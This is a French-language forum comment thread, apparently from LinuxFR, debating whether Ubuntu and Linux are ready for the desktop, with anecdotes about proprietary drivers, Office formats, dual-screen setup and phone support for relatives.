          Si tu veux, je peux te parler des drivers windows buggués, des drivers qui ne sont pas disponibles lorsque l'on met le Windows a jour, des drivers dont le proprietaire a perdu le CD (tres facile de gerer ca: explique au type qui supplie que sa machine re-marche que telecharger tous les drivers va prendre du temps, on risque de ne pas tous les trouver, ...).

          Je peux te dire que quand tu as une machine pourtant pas trop ancienne sous Windows mais dont les drivers ne sont plus disponibles, c'est assez triste: la super carte 3D d'il y a qq annees qui ne fonctionne plus qu'en 800x600, c'est assez dommage.

          Je peux aussi te parler de multiples soirees passees a re-installer windows et leurs logiciels chez des copains; je compte plusieurs soirs a se coucher a 1h du matin avant que la machine soit un minimum en etat de marche.

          Je peux aussi t'expliquer que la pluspart des gens ne se configurent pas le dual-head a la main, non ils appellent une connaissance (Bibi en l'occurence) des qu'il faut creer un raccourci sur le bureau.

          Ajouter a cela les degats repetes des virus, spyware et autres qui mettent la machine a genoux des que l'on n'y prend pas garde, cela commence a faire beaucoup pour un systeme "simple et convivial"

          Je suis désolé, mais ça me fatigue vraiment d'entendre en permanences des bétises pareilles sur la facilité de gestion d'une machine sous Windows, parce que le type que l'on appelle sans arret pour tout remettre d'aplomb pendant son temps libre, c'est moi (qui n'utilise plus Windows depuis 10 ans a cause de tout cela)

          Donc oui, tout n'est pas rose sous Linux, il y a des problemes avec les materiels qui ne diffusent pas leurs specs, mais les problemes de pilotes existent aussi sous Windows. Au final, pour etre tranquille, achete du materiel pour lequel un pilote GPL existe et est integre au noyau (le pilote sera toujours disponible, il suffit de brancher et ca marche, ...)

          Allez, une petite anecdote pour la fin: j'avais achete une carte reseau PCMCIA. En premier dans la boite, un petit livret (quelques pages) avec ecrit en tres gros et rouge comme quoi il ne fallait pas mettre la carte dans un PC sous Windows avant d'avoir suivit les instructions du livret. Suivent plusieurs pages expliquant une longue liste d'etapes a suivre (et la liste etait reellement quelque chose a suivre). A la fin, le constructuer avait ajoute les instructions pour Linux (en substance):
          *inserer la carte
          *l'ordinateur fait "bip bip", c'est bon, l'interface reseau est detectee
          Et ce genre de chose m'arrive assez souvent...
          • [^] # Re: pas encore prêt

            Posté par (page perso) . Évalué à 8.

            Et oui...

            Mais tant que tu les aides, les gens ne s'en rendent pas compte. Et trouvent Windows facile.

            http://ploum.frimouvy.org/?2005/01/25/36-je-ne-suis-pas-un-n(...)
            • [^] # Re: pas encore prêt

              Posté par (page perso) . Évalué à -2.

              Quand les moinsseurs comprendront que parfois on met un lien vers son site non pas pour augmenter son compteur mais simplement parce qu'on estime que le lien peut comporter des informations intéressantes pour la personne à laquelle on répond, ce sera déjà un énorme pas en avant...
            • [^] # Re: pas encore prêt

              Posté par . Évalué à 0.

              Tout à fait d'accord.
              Pour la petite histoire, depuis hier après midi, je me bats avec mon portable du boulot. Je fais de l'automation, CAE électrique, etc donc bcp de softs (sous win bien sûr) et de données en mouvements. Ben, comme d'hab, après qlq semaines je me retrouve avec un système hyper lent because fragmentation. On m'a poutant offert 1 Go de ram supplémentaire qui n'a rien arrangé (pire: plus possible de mettre la machine en hibernation, pourtant bien pratique quand la machine met une plombe à démarrer)

              Bref, je tente la défragmentation avec l'outil intégré à xp et rien n'y fit, pas de résultats. Après environ 3h de bagarre entre les petites lignes rouge, vertes et bleus, j'ai toujours un disque multicolore.
              Du coup, j'ai du installer un nouveau soft pour mettre de l'ordre là dedans, pour réparer la merde que crée winxp tous les jours sur mes partitions.
              En tout, j'ai passé plus de huit heures pour avoir un système avec un semblant de vitesse jusqu'à la prochaine fois.
              Si c'est ça la facilité d'utilisation
              • [^] # Hors sujet (Windows, désolé)

                Posté par . Évalué à 1.

                Ben, comme d'hab, après qlq semaines je me retrouve avec un système hyper lent because fragmentation.
                Bref, je tente la défragmentation avec l'outil intégré à xp et rien n'y fit, pas de résultats.

                Pour info, le fichier d'échange (swap) est par défaut redimensionné dynamiquement et se retrouve donc rapidement fragmenté. S'en suit une dégradation des performances terrible dès qu'on "tape" un peu dedans. Évidemment, il ne peut pas être défragmenté pendant qu'on l'utilise (à moins que ça n'ait changé récemment; plus ça va, plus j'essaie d'éviter au maximum de toucher à Windows)...
                La solution la plus simple et la plus efficace : fixer sa taille à peine vient-on d'installer le Windows.
                Sinon, le mettre à 0, défragmenter, puis fixer une taille appropriée.
                Mieux, évidemment : arrêter Windows, de toute façon, je ne sais pas comment on peut supporter les versions récentes, où retrouver où ils ont caché les fonctionnalités dont on a besoin tient du jeu de piste, voire de l'enquête de police.

                Théorie du pot-au-feu : « Tout milieu où existe une notion de hauteur (notamment les milieux économique, politique, professionnels) se comporte comme un pot-au-feu : les mauvaises graisses remontent. »

          • [^] # Re: pas encore prêt

            Posté par (page perso) . Évalué à 6.

            *l'ordinateur fait "bip bip"
            Encore un utilisateur satisfait de Coyote Linux ?
            http://www.coyotelinux.com/
        • [^] # Re: pas encore prêt

          Posté par (page perso) . Évalué à 2.

          >Pareil pour Windows, je n'ai jamais eu de pb avec le dual screen alors que tu ne peux pas nier que pour avoir le dualscreen sur linux tu dois bricoler ton xorg.conf. Vas expliquer comment faire à ta grand-mère !

          Je trouve beaucoup plus simple d'expliquer à quelqu'un comment regler quelque chose via une commande ou un fichier de configuration que de dire, "tu va là, tu clique à gauche, bouton droit edtion etc..."
          • [^] # Re: pas encore prêt

            Posté par (page perso) . Évalué à -1.

            On n'a pas les meme "quelq'un".
            Ma mere a deja du mal avec la notion de repertoire et de fichier, je n'irai jamais lui dmeander d'ouvril un terminal, et de faire "cd xxx".
            Le terminal pour les geeks OK, mais arretez de penser que le terminal, c'est naturel... C'est naturel que pour les geeks.
            • [^] # Re: pas encore prêt

              Posté par (page perso) . Évalué à 6.

              Oui, ce n'est pas naturel, mais là, le but est de lui dicter ce qu'il faut faire, pas de la laisser se débrouillier. Il est quand même plus facile de dire à quelqu'un "tape exactement ça" que "clique là", parce que la souris c'est bien mais c'est visuel, et que par téléphone on ne voit pas (et demander à quelqu'un qui comme tu dis qui n'y connait rien de décrire ce qu'il voit, c'est pas glop, mais lui demander de lire ce qui est affiché c'est pratique).
              • [^] # Re: pas encore prêt

                Posté par (page perso) . Évalué à 3.

                D'expérience avec ma copine, ce n'est pas toujours aussi évident que cela car ce qui est affiché dans le terminal est parfois très flou pour un non-initié.
                • [^] # Re: pas encore prêt

                  Posté par (page perso) . Évalué à 1.

                  D'expérience je confirme mais les panneaux de configurations graphiques à régler à la souris c'est encore pire. Entre deux maux, autant choisir le moindre.

                  pertinent adj. Approprié : qui se rapporte exactement à ce dont il est question.

              • [^] # Re: pas encore prêt

                Posté par (page perso) . Évalué à 3.

                As-tu deja essayé?
                Moi oui, et je prefere mille fois l'interface graphique.

                Le terminal, par telephone, deja ca fait peur a la personne, elle commence a te detester. ensuite, la commande n'est pas claire ("cédé"? "sédé"? "cdxx"? "cdespacexx"? imagine pour plus de lettre barbares et surtotu des lettres qui se resemblent genre m et n...)

                Non, meme par telephone, surtotu par telephone, un terminal c'est l'horreur... C'est du vécu.
                • [^] # Re: pas encore prêt

                  Posté par . Évalué à 2.

                  ouais ben l'autre jour, j'ai voulu filer à mon père un paquet de photos qui étaient sur mon disque, et je peux dire que j'en ai c**é par la p**e au téléphone, pour lui faire utiliser winscp. Si il avait eu un petit shell et un scp en ligne de commande au moins, j'aurais pas galéré 20 min.

                  Je pourrais aussi parler de la fois où j'ai voulu demander à ma mère de faire une recherche google (toujours au téléphone, hein ?) : après lui avoir fait rentrer la recherche, la page des résultats s'affiche, je lui dis "lis moi les résultats" ... elle me les lit ...
                  moi : "ah, c'est le deuxième, vas y"
                  elle : "ok"
                  moi : "bon, alors maintenant (je connaissais le site de mémoire) tu vas sur tel-truc"
                  elle : je le vois pas
                  moi : qu'est ce que tu vois alors ?
                  elle : ben le_titre_du_site , www.titre_du_site.com ..
                  moi : ben c'est ça, il y a forcément tel-truc, sur ce site, j'y vais tout le temps
                  elle : non, je t'assure

                  Au bout d'un quart d'heure, j'ai fini par comprendre que quand je lui avais dit "vas-y" (en début de conversation), elle s'était placée sur le deuxième résultat , mais n'avait pas cliqué dessus. J'ai réalisé alors avec effroi qu'elle ne connaissait pas le concept de lien hypertexte. Ben ce genre de trucs au téléphone, ça peut vous arriver aussi, alors qu'à la ligne de commande, au moins, on évite ce type de surprises désagréables. C'est simple : le mec il tape du texte, et il lit du texte. Pas de mauvaise surprise du genre (ah bon, fallait cliquer sur le résultat ?)
            • [^] # Re: pas encore prêt

              Posté par (page perso) . Évalué à 0.

              J'ai fais de la hotline pour un FAI, je peut te dire qu'il etais plus simple de faire "cmd" et "ipconfig /release" que de le faire à la souris.
            • [^] # Re: pas encore prêt

              Posté par (page perso) . Évalué à 2.

              On n'a pas les meme "quelq'un".
              Ma mere a deja du mal avec la notion de repertoire et de fichier, je n'irai jamais lui dmeander d'ouvril un terminal, et de faire "cd xxx".
              Le terminal pour les geeks OK, mais arretez de penser que le terminal, c'est naturel... C'est naturel que pour les geeks.


              C'est peut être moins joli, ou tout ce que tu veux mais ce n'est en aucune manière moins facile. A mon avis, c'est aussi facile d'apprendre a une personne qui n'y connait rien une interface graphique qu'un terminal ... peut être même plus facile de lui apprendre le terminal.
              Avec un terminal, d'abord, pas besoin de maîtriser la souris, ensuite, il n'y a pas 36 endroits où regarder, juste à la fin du texte, la où le curseur clignotte (et éventuellement un peu au dessus pour voir le résultat de la commande).
              Une interface graphique te montre des fenêtres avec pleins de boutons et un novice peut s'y perdre facilement, il faut déja qu'il arrive a faire la distinction entre une fenêtre et une autre ...

              Le terminal c'est un dialogue avec la machine, si on y va sans préjugés, ce n'est pas très compliqué, on tape une commande suivie par entrée ... et a chaque fois, l'ordinateur va répondre a cette commande....
              Après, ce n'est peut être pas dans les habitudes des novices en ce moment ...

              Je connais un ami a qui on avait prêté un ordinateur datant de 1980, un portable avec un clavier détachable et d'une taille assez conséquente. Il y avait dessus un vieux prompt DOS et une version de Word ... et bien, il y arrivait très bien même si il ne conaissait pas toutes les commandes.

              Ceci dit, les interfaces graphiques sont très utiles, et je ne me passerait pas des programmes graphiques que j'aprécie beaucoup.
        • [^] # Re: pas encore prêt

          Posté par . Évalué à 5.

          Tu veux un exemple de dual screen qui foire sous windows ? Recycler un vieux portable dont l'écran LCD est cassé comme station multimédia branché sur la TV. Pas complètement impossible mais windows (peut-être les pilotes mais je veux pas savoir j'ai payé je veux que ça marche) a la bonne idée de foutre en l'air la config dès qu'il ne détecte pas l'écran branché sur la sortie TV donc c'est marron, j'ai autre chose à faire que tout reconfigurer à chaque démarrage. Avec xorg.conf ça marche.

          Comment on fait pour faire marcher son scanner qui marchait si bien sous 2000 et qui n'a plus de driver sous XP ? Bien sur les drivers 2000 provoquent un écran bleu :) la faute au fabricant assurément. Avec xsane ça marche sans .conf.

          J'acquiers un tout en un scan/imprimante pour remplacer une imprimante moribonde et gagner de la place et là patatrac le fabricant n'a pas prévu que l'on puisse installer le pilote sur un réseau... la faute au fabricant et je veux rien savoir j'ai payé je veux que ça marche, j'arrête de respirer, je tape du pied et pourtant à moi de trouver une solution... Bon elle est toute trouvée ma femme a réussi à s'habituer à linux, son portable peut donc imprimer.
        • [^] # Re: pas encore prêt

          Posté par (page perso) . Évalué à 7.

          Pareil pour Windows, je n'ai jamais eu de pb avec le dual screen alors que tu ne peux pas nier que pour avoir le dualscreen sur linux tu dois bricoler ton xorg.conf. Vas expliquer comment faire à ta grand-mère !

          Une grand-mère, en plus, ça a un besoin de dual screen absolument vital. Merci pour cette éclatante démonstration.
          • [^] # Re: pas encore prêt

            Posté par . Évalué à 0.

            un écran pour chaque oeil. à cet age avancé, il y a souvent un oeil qui dit merde à l'autre...
    • [^] # Re: pas encore prêt

      Posté par (page perso) . Évalué à 5.

      Pour ATI, Skype et Canon, je vois pas trop ce que tu voudrais que ubuntu fasse... C'est a eux d'ameliorer leurs softs/drivers, voire de les fournir dans le cas de Canon...
    • [^] # Re: pas encore prêt

      Posté par (page perso) . Évalué à 10.

      "Les problèmes ont commencé avec mon imprimante, une canon i350 => obligé de passer par la case Turboprint, qui est une bouse absolue."

      - Je ne connais pas mais effectivement, y'a pas mal de problèmes avec les imprimantes Canon. La faute au constructeur, je sais que ça t'aide pas, mais Ubuntu ne peut pas faire grand chose. HP a un excellent support avec des pilotes libres, je te le conseille.
      Reportes le bug sur launchpad et envoie toujours un mot à canon ;-).

      "Idem avec ma carte ATI. Non seulement la configuration du dualscreen m'a bouffé du temps, mais le résultat est décevant et buggé. Autre bug ATI auquel j'ai contribué : ttps://launchpad.net/bugs/47371"

      - De nouveau une carte avec des drivers proprios. Du coup, on ne sait pas faire grand chose...
      Si tes drivers foiraient sous Windows, tu accuserais Windows ? ou Ati de releaser des drivers foireux ?


      "Sans parler de la masse de document word que ma femme possède et qui merdouillent avec Open Office : mise en page à se retaper, caractères manquant... Hors de question de tout retoucher !"

      - Format proprio. Il faut que tu prennes ça comme un signal d'alarme justement. Et que se passerait-il si demain Word coûte 1000¤ sans possibilité de piratage ? Je sais que c'est chiant, mais bon avoue que là...

      "Sans parler de la lourdeur de cette application et de ses fonctions quand même assez limitées."

      - Fonctions limitées ? Je ne sais pas, je trouve qu'il y en a trop. Tu ne crois pas que c'est parce que les fonctions sont simplement différentes ? Je connais des gens qui se plaignaient d'OOo mais au bout d'un an ne savent plus repasser à MS Office. Lourdeur ça oui, certainement. Sur un PC moderne cela ne pose pas de problème mais j'avoue que sur une machine un peu ancienne, c'est relativement frustrant.

      "Skype ? pareil, bricolage indispensable pour le faire fonctionner correctement."

      - Logiciel propriétaire qui fonctionne nickel chez beaucoup de gens. Plains-toi chez eux. Si tu avais des problèmes à installer skype sous Windows, ce serait de la faute de Windows ?
      ou essaye OpenWengo ?

      "Pour remplacer Visio, je n'ai que le triste Dia. NVU ne souffre pas la comparaison avec Dreamweaver..."

      - Je trouve Dia ultra puissant mais j'avoue ne pas connaitre visio. Es-tu sûr que ce n'est pas juste une question d'habitude ? Nvu, je n'aime pas du tout tout comme je n'aimais pas Dreamweaver, je peux pas t'en dire plus. Certains assurent le contraire de toi donc qui croire ?



      Conclusion : autant je comprends que tu ne puisses utiliser Ubuntu à cause de tes problèmes autant je trouve symptomatique que la toute grosse majorité de ce que tu signales est dû à des protocoles/formats propriétaires et du hardware sans spécifications sur lequel le monde du libre ne peut pas faire grand chose, même avec toute la bonne volonté du monde.

      N'est-ce pas révélateur de la pratique commerciale du monde propriétaire après tout?
      J'avoue qu'OpenOffice est lourd et chiant. Mais je me rend compte que finalement, c'est pas ça qui change réellement les choses... Ça aide tout au plus à se convaincre soi-même que "Linux n'est pas prêt pour le desktop" (phrase qui signifie généralement "Je ne suis pas prêt pour Linux"). Le gros problème reste à mes yeux le hardware et les formats propriétaires...
      • [^] # Re: pas encore prêt

        Posté par . Évalué à 3.

        Je suis complètement d'accord avec toi.

        Mais ce que je cherche à montrer, c'est que l'utilisateur de base ne pourra pas faire face à tout cela.

        Est-ce vraiment délibéré de la part des constructeurs ? Ont-ils vraiment un intérêt ?
        Ou y a -t-il un manque de kit de développement ? Le problème n'est-il pas que les drivers soient intégrés au noyau ? Une couche de communication virtuelle et hors du noyau pour les pilotes ne fait-elle pas défaut ?
      • [^] # Re: pas encore prêt

        Posté par . Évalué à 5.


        - Je trouve Dia ultra puissant mais j'avoue ne pas connaitre visio. Es-tu sûr que ce n'est pas juste une question d'habitude ?
        `

        Euh ...fait joujou un jour avec Visio et je pense que tu remettras serieusement en cause l' "ultra-puissance" de dia .
      • [^] # Re: pas encore prêt

        Posté par (page perso) . Évalué à 0.

        "Pour remplacer Visio, je n'ai que le triste Dia. NVU ne souffre pas la comparaison avec Dreamweaver..."

        - Je trouve Dia ultra puissant mais j'avoue ne pas connaitre visio. Es-tu sûr que ce n'est pas juste une question d'habitude ?


        Je pense que ce qui manque à Dia, ce n'est pas vraiment du code mais des bibliothèques d'images pour ne pas trop souffrir de la comparaison avec Visio. Simplement, c'est généralement pas libre.
    • [^] # Re: pas encore prêt

      Posté par . Évalué à 5.

      Pas de chance...

      t'as 2 pieces materielles dont les contructeurs se foutent completement de savoir si ca tourne ou pas sous linux et des problemes avec des applis et des formats proprios...

      En fait, ton probleme n'est pas ubuntu ni meme linux en general... ton probleme vient bien de tout tes choix initiaux malencontreux et de leur migration.

      Malheureusement, tous ces problemes ne peuvent etre regles que par leur editeur/constructeur respectif donc ca sert a rien de venir pleurer ici...

      Personnellement, je n'utilise que des applis et des formats Libres depuis plusieurs annees ainsi que du matos dont les drivers sont Libres ou au moins pas trop pourris. Et tout va tres bien... meme si je passe sous windows... dingue non ? non, c'est juste que je me suis sorti de la dependance aux formats proprio suffisament tot pour ne pas trop en souffrir. Et maintenant je suis Libre ;)
    • [^] # Re: pas encore prêt

      Posté par . Évalué à 8.

      juste ma (désagréable) petite expérience:
      j'utilise Linux depuis des années au boulot et à la maison bien sûr
      chez moi, j'avais un PC dans le salon pour la musique, les vidéos, les DVD...
      un jour, après d'obscures bidouilles, beaucoup de fatigue et le manque de temps, voilà que ça tombe en caraffe, la lecture des divx merdent grave, impossible de regarder un film en entier sans plantage...
      tollé général @home, je suis trainé dans la boue, la tension monte...
      je pédale dans la semoule quelques temps puis je finis par abandonner et finalement je me dis que j'ai qu'à installer XP, la solution de facilité quoi, ça va marcher vite fait, tant pis pour mon amour propre et mes principes
      vlan: j'enfourne le CD et je lance l'install...
      j'admire les écrans éllogieux pendant l'install: plus beau, plus rapide, plus éfficace, plus facile, plus sécurisé... (que quoi?)(sic)
      ok, premier reboot: plus d'affichage!
      et oui, l'affichage se faisait sur la TV et bien sûr bilou s'emmelle les piceaux: obligé d'aller chercher un moniteur pour configurer le dual screen
      deuxième surprise: le lecteur système s'appelle E: (?) hé oui, j'avais oublié d'enlever ma clé USB du PC pendant l'installation, donc bilou a logiquement appelé la clé C: et le disque dur E:
      dernière surprise, et non des moindres après quelques dixaines de reboots et les nerfs en compote: impossible de lire un DVD!!! il faut "acheter" un lecteur!
      bon, j'opte pour power DVD qui à l'air pas mal
      coup de grace: impossible de lire un DVD et d'afficher un DVD sur la sortie vidéo de la carte graphique!!!!! c'est pour des questions de protection des droit d'auteur mon brave monsieur, au cas ou j'aurais eut l'idée de copier le DVD sur un magnétoscope!!!
      furieux, je reformate tout et je réinstalle Linux
      finalement j'ai quand même trouvé mon problème: c'était la config de mon mplayer préféré qui était en cause...
      tout ça pour dire que WinDO$ c'est pas plus facile et surtout si j'avais dû payer les licences pour arriver à ce résultat!!!
      à lépoque j'utilisais Mandrake (chauvinisme?) mais finalement j'aime de moins en moins leur côté comcom
      maintenant j'utilise plutôt Ubuntu surtout pour la philosophie qui est dernière et Redhat au boulot
      la première distrib que j'ai utilisé c'était une Slakware c'était en 96
      là j'avoue que faire tourner X et configurer une connexion c'était plutôt sportif!

    • [^] # Re: pas encore prêt

      Posté par . Évalué à 1.

      1) changer imprimante
      2) crossover + MS office (ou un truc du genre)
      3) pour le dualscreen sans bug : attendre (et plus si affinité)

      Tout ça, ça coûte cher, mais c'est provisoire. Pour l'imprimante, faut faire gaffe en l'achetant. Pour les .doc, il faut bien commencer à migrer un jour ou l'autre. Et se méfier des mises en page tarabiscotées (ce n'est pas de la PAO). Une autre solution, mais qui coûte cher aussi, c'est MacOS. C'est pas libre, mais ça préserve une certaine diversité et une certaine interopérabilité, de fait...

      Pour moi, ça y est, Linux c'est enfin prêt pour tout le monde, foncez !
    • [^] # Re: pas encore prêt

      Posté par . Évalué à 1.

      epson et hp supporte 1000x mieux linux que canon.
      la prochaine fois vérifie la disponibilité de driver avant d'acheter. Il m'est arrivé la même chose avec mon APN, maintenant je fais attention ...
    • [^] # Re: pas encore prêt

      Posté par (page perso) . Évalué à 0.

      Si la ubuntu ne te convient pas, tente une autre distribution...

      Tu a plusieurs choix pour avoir tout qui marche et une combinaison de tout est le mieux :
      - Corrige/fait les logiciels (expert recommandé)
      - Achète du matériel "compatible" Intel/NVIDIA par exemple et pas ATI qui fait des drivers pourrit seulement parce qu'ils avaient essuyés trop de plaintes !!!
      => http://www.linuxprinting.org/
      => http://www.mandriva.com/en/hardware/

      - Pour les finitions, teste et rapporte les bugs en avance (1-2mois avant la sortie de la finale minimum)
      => Par exemple installe un mandriva-cooker, met toi sur la liste de développement, teste là, et rapporte ce qu'il ne te plaît pas/marche pas.
      http://qa.mandriva.com/ (laisse tomber les rapports de bugs pour autre chose que la cooker ça sera jamais corrigé)
      L'idéal serait à interval régulier avec mise à jour avant de faire les tests.
      Ça te demande 1-5Go de place disque dans le pire des cas et ça te permettra de voir si c'est un bug ubuntu/mandriva ou du logiciel.

      Quand au document MSWord :
      -> t'avais qu'a utiliser un format ouvert, un format fermé c'est les emmerdes assurées... Pense à les mettre en odt que ça marche partout désormais (koffice, openoffice, abiword, etc...)

      Bugs venant des logiciels proprios :
      -> ATI : autant parler a un mur (expérience personnelle inside)
      -> Skipe : logiciel proprio, utilise une alternative libre (ekiga/wengo/etc...)
      -> Dia : y a d'autres outils, mais en général ils ne seront pas aussi avancé (tu a les outil de kde kivio et l'équivalent gnome)
      -> NVU : bah, je l'ai laissé tombé, trop compliqué pour pas grand chose.
      Je pense que le problème vient du manque de public et d'utilisateur de ces solution et que les personnes capable de l'améliorer travaille en texte sur leur moteur php/perl/etc et tape leur html+css avec un outil texte avec coloration syntaxique seulement...

      Imprimante turbolinux :
      -> achète une imprimante supportée, epson ennuie la communauté en ne fournissant aucune spécifications technique

      Ps : tu a seulement utilisé ubuntu et debian, et crois moi niveau convivialité il y a nettement mieux...
      (mandriva et suse ont des outils de config nettement plus pratiques)
  • # Ahhhh Ubuntu :)

    Posté par . Évalué à 10.

    La fameuse distribution qui rend les gens heureux.

    Démonstration :

    Ubuntu c'est super (©). Tout est simple et beau avec Ubuntu.
    D'abord je télécharge le CD. Incroyable comment c'est simple, je clique et je le grave, j'aime cette simplicité.
    Après je reboot, c'est simple, ça marche, j'ai juste à appuyer sur un bouton. Après y'a l'installation : ouahou c'est très simple, je dois cliquer et c'est tout, c'est génial. Après Ubuntu démarre, et c'est très simple : tout est simple ! ah oui j'aime.
    Et puis l'utilisation est très simple, je dois cliquer ici et là et ça marche, ma foi c'est fort simple ! Tout est simple sous Ubuntu. Ubuntu = simplicité dans le dictionnaire des synonymes.

    Ah et puis c'est sobre, y'a 2 couleurs dominantes, c'est simple, c'est jolie parce que c'est simple, ça marche parce que c'est simple.

    On peut tout faire sous Ubuntu, du moment que c'est simple.
    La dernière fois j'ai vu KDE, argh j'ai failli m'évanouir ! J'en revenais pas, y'avait des choix à faire et des options ! Ca m'a perturbé, j'ai failli devenir fou, plus rien n'était simple, je ne savais plus calculer 2+2 ni faire cuire mes pâtes.

    Depuis, avec ubuntu, ma vie a changé, j'utilise mon ordinateur comme j'utilise ma machine à laver, j'ai juste à appuyer et c'est simple. D'ailleurs chez moi j'ai tout viré et j'ai gardé un lit, une chaise et une table. Y'a pas à dire, Ubuntu ça change la vie.
    • [^] # Re: Ahhhh Ubuntu :)

      Posté par . Évalué à 0.

      Je partage ton opinion.
      En partie cependant, parce qu'en même temps tu as quand même beaucoup de chance de ne pas avoir eu de problème de matos, ce qui n'est pas le cas de tout le monde.
    • [^] # Re: Ahhhh Ubuntu :)

      Posté par . Évalué à -1.

      Mon pauvre, il semblerait que tu sois atteinds d'une ploumite aigüe, il est temps d'aller te faire soigner.

      Passe à mon bureau et je te ferais une ordonnance.
    • [^] # Re: Ahhhh Ubuntu :)

      Posté par . Évalué à 0.

      Arf, il parait même que le micro-onde et les plats cuisinés ont rendu le diner simple et bon.
      Alors que passer une petite heure en cuisine pour préparer de bons plats en rentrant du marché, après le boulôt, à ... 20h est si exitant!

      Tout le monde ne "consomme" pas GNU/Linux de la même façon, c'est pour ça qu'il y a du choix dans les distributions.

      Pire encore, il y a des gens pour qui l'OS doit être pré-installé sur leur PC et ils trouvent ça pratique. Espérons qu'on ne verra jamais ça avec des distributions GNU/Linux, l'installation est si exitante.
  • # Liste des paquets serveur

    Posté par . Évalué à 1.

    Bonjour,

    Vous avez un lien vers la liste des paquets officiels de la version serveur ?

    Merci.
    • [^] # Re: Liste des paquets serveur

      Posté par (page perso) . Évalué à 1.

      http://releases.ubuntu.com/6.06/ (note : lire toute la page)

      Dans la news, y'a un lien appelé "page de téléchargement".

      Je veux pas faire mon schtroumpf à lunettes, mais j'aurais ptêt essayé là avant de poster un commentaire ;-)
    • [^] # Re: Liste des paquets serveur

      Posté par . Évalué à -1.

      Ce sont les même que ceux de la version desktop la seule chose qui change ce sont les paquets installés par défauts
      • [^] # Re: Liste des paquets serveur

        Posté par . Évalué à 1.

        Oups! Je crois qu'on c'est trompé tous les deux le messieurs veut savoir quels sont les paquets installés par défauts sur la version server je crois.
        mais il n'y existe aucun méta-paquet ubuntu-server ou ressemblant :/
      • [^] # Re: Liste des paquets serveur

        Posté par . Évalué à -2.

        Oui donc tu as tout autant de merde inutiles qui encombre la distrib pour rien.
        • [^] # Re: Liste des paquets serveur

          Posté par . Évalué à 0.

          ça n'emcombre que les miroirs d'ubuntu, en quoi est-ce que ça gène qu'il y ait des paquets en plus?
          Personne ne t'obliges à les installer.
          • [^] # Re: Liste des paquets serveur

            Posté par . Évalué à -2.

            evms, hfs (encore que pour powerpc je suis pour), mdam et tout un tas de connerie de ce genre installé par defaut sur un desktop...

            c'est quand même difficilement compréhensible. C'est pas n'importe qui qui utilise evms ou madm. Le pekin moyen il s'en tape de faire un raid soft ou un gestionnaire de volume logique sur sa machine. Mais bon, l'influence de windows est là.
        • [^] # Re: Liste des paquets serveur

          Posté par (page perso) . Évalué à 0.

          Quelle merde debian, je veut installer gnome et dans la liste des paquets je vois qu'on peut installer apache, quelle honte...
      • [^] # Re: Liste des paquets serveur

        Posté par . Évalué à 0.

        Si les mêmes paquets sont supportés officiellement pour la version desktop et la version serveur, pourquoi la version serveur est maintenue 5 ans et la version desktop que 3 ans ?
        • [^] # Re: Liste des paquets serveur

          Posté par . Évalué à 1.

          Parce que, si j'ai bien tout lu et bien tout compris (après cet hallali de trolls mutants et enragés sur cette news j'ai du mal à reprendre mes esprits j'avoue):
          Ubuntu propose désormais une version serveur et bureau distincte avec chacune un noyau optimisé et une sélection de logiciels différente. Canonical propose un support payant de $700 USD par serveur et par an.


          Le binaire du noyau semble donc être différent entre les deux versions. Et la maintenance sur 5 ans de la version serveur (basée donc sur un noyau spécifique) peut être accompagné du support payant et professionnel (*) sur le même terme.

          (*) j'entends, et suppose, par là: suivi client et machine personnalisés, téléassistance connectée, etc.
  • # Mon impression

    Posté par . Évalué à 2.

    Hotplug a été abandonné au profit de udevplug comme le font déjà Mandriva et Fedora depuis les noyaux 2.6.15. Cela apport un gain de performance notable. Le démarrage d'Ubuntu ne dépend plus de la présence de périphériques, car les périphériques sont maintenant activés au besoin. Le système dépend des services uniquement.

    Ce n'est pas nouveau, vu que c'est un snapshot de Debian et que Debian a envoyé bouler hotplug depuis des lustres (mais je me demande s'ils ont réellement bien fait).

    L'installation de nouveaux logiciels n'a jamais été aussi facile sur aucun autre système ! Des centaines de logiciels sont disponibles, supportés ou communautaires, libre ou commerciaux. L'installation et la mise-à-jour est géré automatiquement. L'interface d'installation est très agréable. Les linuxiens n'ont rien à envier aux Windowsiens et leur telechargez.com et consorts !

    Je trouve ce paragraphe un peu trop commercial à mon goût. Si tu parles de synaptic. Sâche qu'il n'est pas dispo que pour ubuntu, il a existé avant et il existera après.

    Il est désormais aisé de suspendre son ordinateur lorsque l'écran est rabattu !

    Pour ça j'ai des doutes sérieux quand à la réelle influence de gnome-power-manager la dessus. Le fait que le suspend to {ram,disk} fonctionne vient plutôt du fait de l'utilisation du patch suspend2 directement intégré dans le kernel. Mais ce patch moi il me file la trouille en regardant comment ça fonctionne. Je suis curieux de savoir s'ils ont patcher le patch et fait remonter les améliorations upstream.

    Elle contient toujours l'applet poubelle si typique d'un bureau Ubuntu
    J'ai une icone poubelle sur mon bureau, je suis sur ubuntu ? non sous debian avec KDE, une icone ne fait pas la réputation d'une distribution. L'applet de poubelle se retrouve aussi dans Fedora core 5 il me semble. Ca n'a rien de spécifique à ubuntu.
    • [^] # Re: Mon impression

      Posté par (page perso) . Évalué à 0.

      de même :
      On notera aussi la distribution NexentaOS GNU/Solaris.

      quel est le rapport avec la news ?

      M.
      • [^] # Re: Mon impression

        Posté par . Évalué à 2.

        Le rapport avec la news, c'est que NexentaOS est proche d'Ubuntu. Je n'irait pas jusqu'a dire que c'est un dérivé. M'enfin : https://launchpad.net/distros/nexenta

        Je viens de tester le livecd de nexenta. On s'y retrouve comme sur une ubuntu. Je ne sais pas à quel point les systèmes sont commun, mais pas mal de chose sont partagé (l'amour du marron en est le plus visible).

        Étienne.

        PS: si tu n'aime pas la news, fait les !!
        • [^] # Re: Mon impression

          Posté par (page perso) . Évalué à -3.

          PS: si tu n'aime pas la news, fait les !!

          si tu n'aime pas les questions / commentaires, fait un blog !!!

          M.
    • [^] # Re: Mon impression

      Posté par . Évalué à 0.

      ll est désormais aisé de suspendre son ordinateur lorsque l'écran est rabattu !

      D'ailleurs si j'en crois:
      https://launchpad.net/distros/ubuntu/+source/gdm/+bug/3642

      Ca ne serait pas encore au point....
    • [^] # Re: Mon impression

      Posté par (page perso) . Évalué à 0.

      On ne parle pas de synaptic je pense mais du "Ajouter/Enlever" des programmes.
      Puis la on parle de "linuxiens", donc je ne pense pas que ce la soit dirigé contre ta distribution favorite, on dit juste que c'est bien, on a pas dit que c'etait mieux que les autres
      • [^] # Re: Mon impression

        Posté par . Évalué à 1.

